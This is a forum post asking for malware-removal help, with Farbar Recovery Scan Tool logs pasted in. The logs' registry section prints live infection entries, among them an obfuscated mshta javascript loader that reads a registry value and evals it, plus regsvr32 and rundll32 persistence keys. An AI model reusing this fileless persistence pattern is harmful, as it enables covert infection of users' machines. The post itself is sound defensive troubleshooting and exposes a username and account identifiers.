Hi
Recently my antivirus started blocking some infected files, which I subsequently deleted. Then I started receiving the RegSvr32 message upon startup.
I receive two of these errors:
"C:\Users\Melinda\AppData\Local\lpl...\tvpgojdx.dll"
"C:\Users\Melinda\AppData\Local\Ek...\mpzrowjb.dll"
A window also pops up that says:
Windows cannot find 'C:\Users\Melinda\AppData\Roaming\47ddd\fd6b5.65f2aa'. Make sure you typed the name correctly, and then try again.
I thought a system restore to factory settings would solve the problem, but it didn't.
Please help!
Please see below my FRST.txt and Addition.txt logs.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2016
Ran by Melinda (administrator) on MEL (06-07-2016 09:07:15)
Running from C:\Users\Melinda\Desktop
Loaded Profiles: Melinda (Available Profiles: Melinda & Administrator)
Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McA2BB0.tmp
(Microsoft) C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
() C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
() C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\toaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\dbrsync.exe
(Aviata Inc) C:\Program Files (x86)\Dell Product Registration\prodreg.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ModuleCore\ModuleCoreService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\CSP\1.9.741.0\McCSPServiceHost.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\mcafee\vul\McVulCtr.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McUICnt.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17477_none_fa2b7d3b9b36c7b4\TiWorker.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\vssx64.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-07-09] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1387736 2014-07-05] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [562264 2014-04-10] (Waves Audio Ltd.)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3777696 2014-01-17] (Dell Inc.)
HKLM-x32\...\Run: [DropboxOEM] => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [462160 2014-09-02] ()
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Microsoft system protection service] => rundll32.exe "C:\Users\Melinda\AppData\Local\Microsoft\Protect\protecthost.dll",DllInstall
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [**ucabwqcmu<*>] => "C:\Windows\system32\mshta.exe" javascript:UijM5="a9Z";s0c=new%20ActiveXObject("WScript.Shell");tgg8jMFW4="M7agQqde";nHzc77=s0c.RegRead("HKCU\\software\\fokfinshfo\\kblbsn");a43CaBx="1qdI";eval(nHzc77 (the data entry has 12 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [**niawqwmeni<*>] => "C:\Users\Melinda\AppData\Local\d6ab6\e9597.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Iplmsoft] => C:\Users\Melinda\AppData\Local\Iplmsoft\tmpDE80.exe
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [YjpwPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Melinda\AppData\Local\Iplmsoft\tvpgojdx.dll
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Ekbrtion] => regsvr32.exe C:\Users\Melinda\AppData\Local\Ekbrtion\mpzrowjb.dll <===== ATTENTION
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\MountPoints2: {05ce7cd0-584f-11e5-825e-acd1b8d216c6} - "F:\AutoRun.exe"
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\MountPoints2: {05ce7df2-584f-11e5-825e-acd1b8d216c6} - "F:\AutoRun.exe"
ShellIconOverlayIdentifiers: [DBRShellOverlayBackupFile] -> {831CEBDD-6BAF-4432-BE76-9E0989C14AEF} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconBackuped.dll [2015-12-08] (SoftThinks SAS)
ShellIconOverlayIdentifiers: [DBRShellOverlayModifiedBackupFile] -> {275E4FD7-21EF-45CF-A836-832E5D2CC1B3} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconNotBackuped.dll [2015-12-08] (SoftThinks SAS)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2015-06-07]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Melinda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9630a.lnk [2016-07-06]
ShortcutTarget: 9630a.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Melinda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f0f18.lnk [2016-06-30]
ShortcutTarget: f0f18.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{28CEFB91-FA63-4200-9B83-6978147A71A0}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{812A2ED5-72C3-4457-9E4D-A562956307C8}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001 -> {15187E60-21FC-4B6A-AF68-DCB76EE1584B} URL =
Toolbar: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-05-24] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-05-24] (McAfee, Inc.)
FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin HKU\S-1-5-21-3305678368-1645044794-3837945535-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Melinda\AppData\Local\Citrix\Plugins\104\npappdetector.dll [No File]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 0106601467779372mcinstcleanup; C:\Windows\TEMP\010660~1.EXE [962400 2016-04-12] (McAfee, Inc.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-06-07] (Broadcom Corporation.)
R2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe [141704 2015-02-04] (Microsoft)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [119656 2016-01-15] (Dell)
S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [293440 2014-04-01] (Aviata, Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-01] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [989192 2016-05-24] (McAfee, Inc.)
R3 McAWFwk; c:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe [334608 2013-07-25] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\\McCSPServiceHost.exe [1903320 2016-04-18] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [795528 2016-04-20] (McAfee, Inc.)
S2 McOobeSv2; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-03-07] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-04-01] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-03-07] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1424352 2016-04-21] (McAfee, Inc.)
R2 My Dell Learning Center; C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe [22528 2015-01-22] () [File not signed]
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1029856 2016-04-21] (Intel Security, Inc.)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [253776 2013-07-30] (CyberLink)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2065808 2016-01-04] (SoftThinks SAS)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-06-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-06-07] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2015-06-07] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7569112 2015-06-07] (Broadcom Corporation)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-03-11] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-25] (OSR Open Systems Resources, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2016-03-11] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-03-11] (McAfee, Inc.)
U3 mfeavfk01; no ImagePath
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-03-11] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-03-11] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [842536 2016-03-11] (McAfee, Inc.)
U3 mfehidk01; no ImagePath
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
U3 mfencbdc01; no ImagePath
U3 mfencbdc02; no ImagePath
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243496 2016-03-11] (McAfee, Inc.)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [42664 2015-01-10] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-06-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-06-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-06-07] (Microsoft Corporation)
S0 mfeapfk; system32\drivers\mfeapfk.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-07-06 09:07 - 2016-07-06 09:08 - 00016725 _____ C:\Users\Melinda\Desktop\FRST.txt
2016-07-06 09:06 - 2016-07-06 09:07 - 00000000 ____D C:\FRST
2016-07-06 09:04 - 2016-07-06 09:05 - 02390016 _____ (Farbar) C:\Users\Melinda\Desktop\FRST64.exe
2016-07-06 08:20 - 2016-07-06 08:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-07-06 08:14 - 2016-07-06 08:14 - 00003068 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-07-06 08:14 - 2016-07-06 08:14 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-07-06 08:13 - 2016-07-06 08:13 - 00000000 ____D C:\ProgramData\Intel Security
2016-07-06 08:12 - 2016-07-06 08:12 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-07-06 08:07 - 2016-07-06 08:07 - 00003440 _____ C:\Windows\System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337
2016-07-06 07:58 - 2016-07-06 08:58 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-07-06 07:58 - 2016-07-06 07:58 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-06 07:57 - 2016-07-06 08:46 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3305678368-1645044794-3837945535-1001
2016-07-06 07:55 - 2016-07-06 07:55 - 00000000 ____D C:\Program Files (x86)\Dell Digital Delivery
2016-07-06 07:54 - 2016-07-06 07:54 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Macromedia
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieUserList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieSiteList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieBrowserModeList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\8c2cb
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 ____D C:\Users\Melinda\AppData\Local\fcb0a
2016-07-06 07:52 - 2016-07-06 08:02 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\DropboxOEM
2016-07-06 07:52 - 2016-07-06 07:52 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Adobe
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\Documents\Bluetooth Exchange Folder
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\DropboxOEM
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Broadcom
2016-07-06 06:43 - 2016-07-06 06:43 - 00000000 ____D C:\Users\Melinda\AppData\Local\Aviata
2016-07-06 06:37 - 2016-01-07 01:04 - 00000107 ____H C:\DBAR_Ver.txt
2016-07-06 06:34 - 2016-07-06 06:34 - 00003980 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003440 _____ C:\Windows\System32\Tasks\PCDEventLauncherTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003190 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2016-07-06 06:30 - 2016-07-06 06:30 - 00000000 ____D C:\Users\Melinda\AppData\Local\Power2Go8
2016-07-06 06:29 - 2016-07-06 06:29 - 00000144 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-07-06 06:29 - 2016-07-06 06:29 - 00000000 __SHD C:\Users\Melinda\IntelGraphicsProfiles
2016-07-06 06:28 - 2016-07-06 06:28 - 00000020 ___SH C:\Users\Melinda\ntuser.ini
2016-07-06 02:56 - 2016-07-06 06:37 - 00000000 ____D C:\ProgramData\softthinks
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\My Documents
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-07-05 19:48 - 2016-07-06 02:55 - 00000000 ____D C:\20160705194811_BACKUP
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-07-06 09:06 - 2015-06-07 15:13 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2016-07-06 09:06 - 2015-06-07 15:07 - 00000000 ____D C:\Program Files\Dell
2016-07-06 09:00 - 2015-06-07 15:19 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2016-07-06 09:00 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2016-07-06 08:59 - 2015-06-07 15:15 - 00000000 ____D C:\ProgramData\McAfee
2016-07-06 08:17 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files\Common Files\mcafee
2016-07-06 08:16 - 2013-08-22 17:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-07-06 08:16 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-07-06 08:08 - 2015-06-07 17:10 - 00000000 ____D C:\ProgramData\Dell
2016-07-06 07:52 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files (x86)\Dell Update
2016-07-06 07:51 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2016-07-06 06:40 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-07-06 06:34 - 2015-06-07 15:13 - 00000000 ____D C:\ProgramData\PCDr
2016-07-06 06:32 - 2014-11-21 06:42 - 00863592 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-06 06:29 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda
2016-07-06 06:28 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-06 02:50 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\Web
2016-07-05 09:51 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Packages
==================== Files in the root of some directories =======
2015-06-07 14:43 - 2015-06-07 14:43 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-06-07 15:02 - 2015-06-07 15:02 - 0000121 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log
2015-06-07 14:57 - 2015-06-07 14:58 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
2015-06-07 14:58 - 2015-06-07 15:00 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log
2015-06-07 15:00 - 2015-06-07 15:02 - 0000108 _____ () C:\ProgramData\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}.log
2015-06-07 14:56 - 2015-06-07 14:57 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-07-06 08:47
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by Melinda (2016-07-06 09:08:23)
Running from C:\Users\Melinda\Desktop
Windows 8.1 Single Language (Update) (X64) (2015-06-07 13:37:40)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3305678368-1645044794-3837945535-500 - Administrator - Disabled) => C:\Users\Administrator
Guest (S-1-5-21-3305678368-1645044794-3837945535-501 - Limited - Disabled)
Melinda (S-1-5-21-3305678368-1645044794-3837945535-1001 - Administrator - Enabled) => C:\Users\Melinda
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Amazon 1Button App (HKLM-x32\...\{0A7D6F3C-F2AB-48ED-BE23-99791BFF87D6}) (Version: 1.0.0.4 - Amazon) <==== ATTENTION
Amazon Kindle (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Amazon Kindle) (Version: - Amazon)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 10.0 - CyberLink Corp.)
